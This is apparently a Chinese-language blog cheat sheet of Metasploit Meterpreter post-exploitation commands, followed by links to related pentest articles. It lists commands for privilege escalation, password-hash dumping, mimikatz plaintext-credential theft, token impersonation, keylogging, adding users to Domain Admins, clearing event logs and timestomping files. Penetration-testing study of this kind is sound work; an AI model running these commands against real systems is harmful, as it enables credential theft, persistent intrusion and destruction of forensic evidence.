msf解决中文乱码问题:输入 chcp 65001(UTF-8) chcp 437(IBM437英语)

sysinfo
列出受控主机的系统信息 getuid
查看当前操控身份 ls
列出目标主机的文件和文件夹信息 use priv
加载特权提升扩展模块,来扩展meterpreter库 ps
显示所有运行进程以及关联的用户账户 getsystem
通过各种攻击向量来提升到系统用户权限 shell
以所有可用令牌来运行一个交互的shell screenshot
对目标主机的屏幕进行截图 upload file
向目标主机上传文件 download file
从目标主机下载文件 keyscan_dump
存储目标主机上或许的键盘记录 getprivs
尽可能多的获取目标主机上的特权 background
将你当前的meterpreter shell转为后台执行 help
打开帮助 run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名 migrate PID
迁移到一个指定的进程ID
hashdump
导出目标主机中的口令哈希值 load mimikatz
加载mimikatz模块 msv
ssp
tspkg
wdigest
获取登录密码的hash值 kerberos
获取明文密码 mimikatz_command -f samdump::hashes
另一种方式获取哈希值 mimikatz_command -f sekurlsa::searchPasswords
另一种方式获取明文密码
portfwd add -l 3389 -r 192.168.206.200 -p 3389
把被攻击机的3389端口流量,转发到本地的3389端口上
use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户) list_tokens -u
列出目标主机用户组的可用令牌 impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。 steal_token
盗窃给定进程的可用令牌并进行令牌假冒 drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。 execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。 execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
add_user username password -h ip
在远程目标主机上添加一个用户 add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中 clearev
清除目标主机上的日志记录 timestomp
修改文件属性,例如修改文件的创建时间(反取证调差) reboot
重启目标主机
rev2self
回到控制目标主机的初始用户账户下。 reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。 setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。 uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块 sniffer_interfaces
列出目标主机所有开放的网络接口 sniffer_dump interfaceID pcapname
在目标主机上启动嗅探 sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探 sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据 sniffer_stop interfaceID
停止嗅探

[后渗透]获取到 Meterpreter 之后的操作的更多相关文章

  1. 渗透攻防工具篇-后渗透阶段的Meterpreter

    作者:坏蛋链接:https://zhuanlan.zhihu.com/p/23677530来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 前言 熟悉Metasploit ...

  2. 后渗透之meterpreter使用攻略

    Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令.脚本及使用方式.包含信息收集.提权.注册表操作.令牌操纵.哈希利用.后门 ...

  3. Meterpreter后渗透之信息收集

    在获得目标的Meterpreter shell后 进行信息收集是后渗透工作的基础 记录一下关于meterpreter 信息收集的使用 环境: kali linux 192.168.190.141 xp ...

  4. Meterpreter后渗透阶段之远程桌面开启

    实验目的 学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面 实验原理 利用Meterpreter生成木马,利用木马控制靶机进行远程桌面的攻击 实验内容 利用Meterpreter后渗透阶 ...

  5. Metasploit Framework(8)后渗透测试(一)

    文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 使用场景: Kali机器IP:192.168.163. ...

  6. 超实用!手把手教你如何用MSF进行后渗透测试!

    在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...

  7. 手把手教你如何用MSF进行后渗透测试!

    在对目标进行渗透测试的时候,通常情况下,我们首先获得的是一台web服务器的webshell或者反弹shell,如果权限比较低,则需要进行权限提升:后续需要对系统进行全面的分析,搞清楚系统的用途:如果目 ...

  8. 7.Metasploit后渗透

    Metasploit 高阶之后渗透 01信息收集 应用场景: 后渗透的第一步,更多地了解靶机信息,为后续攻击做准备. 02进程迁移 应用场景: 如果反弹的meterpreter会话是对方打开了一个你预 ...

  9. Metasploit简单使用——后渗透阶段

    在上文中我们复现了永恒之蓝漏洞,这里我们学习一下利用msf简单的后渗透阶段的知识/ 一.meterperter常用命令 sysinfo #查看目标主机系统信息 run scraper #查看目标主机详 ...

随机推荐

  1. Javascript文件上传插件

    jQuery File Uploader 这是最受欢迎的 jQuery 文件上传组件,支持批量上传,拖放上传,显示上传进度条以及校验功能. 支持预览图片.音频和视频,支持跨域上传和客户端图片缩放,支持 ...

  2. if控制器,如何传参。

  3. Django:RestFramework之-------序列化器

    8.序列化 功能: 对请求数据进行验证 对Queryset进行序列化 8.1一个简单序列化: import json from api import models from rest_framewor ...

  4. Unity手游汉化笔记②:使用UABE替换TTF字体

    总的笔记:https://www.cnblogs.com/guobaoxu/p/12055930.html 目录 一.分析 二.思路 三.具体实践 四.总结 Unity版本:2018.4.5f1 工具 ...

  5. HTTP 强制缓存和协商缓存

    Web 缓存能够减少延迟与网络阻塞,进而减少显示某个资源所用的时间.借助 HTTP 缓存,Web 站点变得更具有响应性. 缓存优点: 减少不必要的数据传输,节省带宽 减少服务器负担,提升网站性能 加快 ...

  6. memcpy函数的实现

    1.按1个字节拷贝 (1)不要直接使用形参,要转换成char* (2)目标地址要实现保存 (3)要考虑源和目标内存重叠的情况 void * mymemcpy(void *dest, const voi ...

  7. Centos6.5配置防火墙

    1.查看防火墙状态 [root@instance-xfl1djr7 ~]# /etc/init.d/iptables status 2.启动/关闭防火墙 开启防火墙 [root@instance-xf ...

  8. 详解CentOS6.7部署Tomcat及主配置文件

    Java程序实现部署及应用 POSIX :可移植操作系统,编程操作系统接口规范,实现跨平台编译运行. API:应用程序编程接口 ABI:应用程序二进制接口 描述了应用程序和操作系统之间,一个应用和它的 ...

  9. Beta冲刺第6次

    二.Scrum部分 1. 各成员情况 翟仕佶 学号:201731103226 今日进展 新增图像拼接合并功能 存在问题 无 明日安排 视情况而定 截图 曾中杰 学号:201731062517 今日进展 ...

  10. 排序算法合集(C++实现)

    摘要 排序操作在程序设计中是非常基础和常见的,也是算法的基础部分,我对几种常见的比较排序算法进行了整理. 暴力排序(violence sort) 思想:遍历数组,每次遍历都在未排序的部分找到最小元素的 ...